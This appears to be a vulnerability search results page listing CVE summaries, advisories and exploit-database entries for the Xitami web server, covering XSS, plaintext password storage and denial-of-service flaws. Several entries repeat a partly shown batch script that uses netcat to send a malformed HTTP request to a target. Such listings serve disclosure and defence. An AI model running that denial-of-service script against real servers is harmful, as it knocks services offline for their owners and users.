115 matches found
CVE-2002-1965
Cross-site scripting XSS vulnerability in Errors.gsl in Imatix Xitami 2.5b4 and 2.5b5 allows remote attackers to inject arbitrary web script or HTML via the 1 Javascript events, as demonstrated via an onerror event in an IMG SRC tag or 2 User-Agent field in an HTTP GET request...
CVE-2000-1225
Xitami 2.5b installs the testcgi.exe program by default in the cgi-bin directory, which allows remote attackers to gain sensitive configuration information about the web server by accessing the program...
CVE-2001-1481
Xitami 2.4–2.5 b4 stores the Administrator password in plaintext in the default.aut file, whose permissions are world-readable, enabling remote attackers to gain privileges. Affected versions: Xitami 2.4–2.5 b4. Root cause: plaintext password storage with insecure default file permissions. Impact...
CVE-2000-1225
CVE-2000-1225 affects Xitami 2.5b where the installer places testcgi.exe by default in the cgi-bin. Accessing this program can disclose sensitive web server configuration information to remote attackers. The accompanying metrics indicate a network-exposed, low-complexity vector with partial confi...
CVE-2001-1481
Xitami 2.4 through 2.5 b4 stores the Administrator password in plaintext in the default.aut file, whose default permissions are world-readable, which allows remote attackers to gain privileges...
Xitami testssi.ssi HTTP Header XSS
The remote Xitami server is distributed with a script for testing server-side includes, '/testssi.ssi'. This script is vulnerable to a cross-site scripting issue when sent a request with a malformed Host or User-Agent header. An attacker may exploit this flaw the steal the authentication...
XITAMI invalid request endless loop
If HTTP header doesn't contain ':' server goes into endless loop...
DOS@XitamiHTTPd
Application: Xitami Web Server Vendors: http://www.xitami.com/xiopen25.zip Version: v2.5c1 Platforms: Windows Bug: D.O.S Date: 2004-07-15 Author: CoolICE e-mail: CoolICEChina.com ================ Content: ---------------- TestCode: @echo off...
Xitami Web Server Denial of Service Exploit
Exploit for unknown platform in category dos / poc =========================================== Xitami Web Server Denial of Service Exploit =========================================== if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if n...
Xitami Web Server - Denial of Service
if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if not exist %%$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof echo GET / HTTP/1.0http.tmp echo HOST: %1http.tmp echo DOShttp.tmp echo.http.tmp nc -w 10 %1 %PORT% http.tmp del...
Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting
source: https://www.securityfocus.com/bid/10778/info It is reported that Imatix Xitami is affected by a cross-site scripting vulnerability in the server side includes test script. This issue is due to a failure of the application to properly sanitize user-supplied input. Successful exploitation o...
Xitami Web Server Denial of Service Exploit
No description provided by source. if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if not exist %%$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof echo GET / HTTP/1.0http.tmp echo HOST: %1http.tmp echo DOShttp.tmp echo.http.tmp ...
Xitami Web Server - Denial of Service
Xitami Web Server - Denial of Service if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if not exist %%$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof echo GET / HTTP/1.0http.tmp echo HOST: %1http.tmp echo DOShttp.tmp echo.http.t...
Xitami Malformed POST Request Infinite Loop Remote DoS
The remote host is running a vulnerable version of the Xitami web server. It is possible to freeze the remote web server by sending a malformed POST request. This is known to affect Xitami versions 2.5 and earlier. C Tenable Network Security, Inc. include"compat.inc"; ifdescription scriptid11934;...
[Full-Disclosure] Xitami Denial of Service in Handling malformed request
Xitami Denial of Service in Handling malformed request ================================================= PROGRAM: Xitami HOMEPAGE: http://www.xitami.com VULNERABLE VERSIONS: 2.5 and below DESCRIPTION ================================================= LiteServe is a very powerful, full-featured,...
CVE-2002-1942
Imatix Xitami 2.5 b5 does not properly terminate certain Keep-Alive connections that have been broken or closed early, which allows remote attackers to cause a denial of service crash via a large number of concurrent sessions...
CVE-2002-1965
Cross-site scripting XSS vulnerability in Errors.gsl in Imatix Xitami 2.5b4 and 2.5b5 allows remote attackers to inject arbitrary web script or HTML via the 1 Javascript events, as demonstrated via an onerror event in an IMG SRC tag or 2 User-Agent field in an HTTP GET request...
ALERT: Xitami 2.5b5
I have notified iMatix via [email protected] of multiple flaws in the GSL templates of Xitami 2.5 Beta. The e-mail was sent out today, so I will release technical details later on, but I did want to release a workaround: In defaults.cfg, users can set "use-error-script" in the "Server" section t...
Xitami GSL problems
No description provided...
Imatix Xitami 2.5 - GSL Template Cross-Site Scripting
source: https://www.securityfocus.com/bid/5025/info Imatix Xitami is a webserver for Microsoft Windows operating systems. It is possible for attackers to construct a URL that will cause scripting code to be embedded in error pages. Xitami fails to check URLs for the presence of script commands wh...